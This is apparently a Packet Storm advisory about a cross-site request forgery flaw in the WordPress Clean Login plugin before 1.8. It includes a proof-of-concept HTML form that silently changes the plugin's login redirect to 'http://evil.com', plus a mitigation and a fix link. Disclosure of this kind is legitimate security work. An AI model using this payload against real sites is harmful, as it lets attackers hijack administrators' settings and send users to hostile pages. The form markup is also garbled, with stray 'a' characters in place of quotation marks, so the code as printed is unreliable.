WordPress Clean Login Cross Site Request Forgery

2017-05-09T00:00:00
ID PACKETSTORM:142426
Type packetstorm
Reporter Zhiyang Zeng
Modified 2017-05-09T00:00:00

Description

                                        
                                            `===============  
  
Software Description  
  
===============  
  
Software:clean login  
  
version:<1.8  
  
description:Responsive Frontend Login and Registration plugin.  
  
  
========  
  
Details  
  
========  
  
CSRF in wordpress plugin clean login allows remote attacker change wordpress login redirect url or logout redirect url to evil address.  
  
  
========  
  
POC:  
  
========  
  
<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">  
  
<input type="text" name= "adminbar" value=aon">  
  
a<input type="text" name="emailnotificationcontent" value="">  
a<input type="text" name="termsconditionsMSG" value="">  
a<input type="text" name="termsconditionsURL" value="">  
a<input type="text" name="urlredirect" value=ahttp://127.0.0.1/wordpressa>  
a<input type=atexta name="loginredirecta value=aona>  
a<input type=atexta name="loginredirect_urla value="http://evil.coma>  
a<input type=atexta name="logoutredirect_urla value="http://127.0.0.1/wordpressa>  
a<input type=atexta name="cl_hidden_fielda value="hidden_field_to_update_othersa>  
a<input type=atexta name="Submita value="Save Changesa>  
<input type="submita>  
  
</form>  
  
  
=========  
  
Mitigations  
  
================  
  
Disable the plugin until a new version is released that fixes this bug.  
  
  
=========  
  
Fixed  
  
=========  
  
https://wordpress.org/plugins/clean-login/#developers(1.8 version update)  
  
  
  
  
`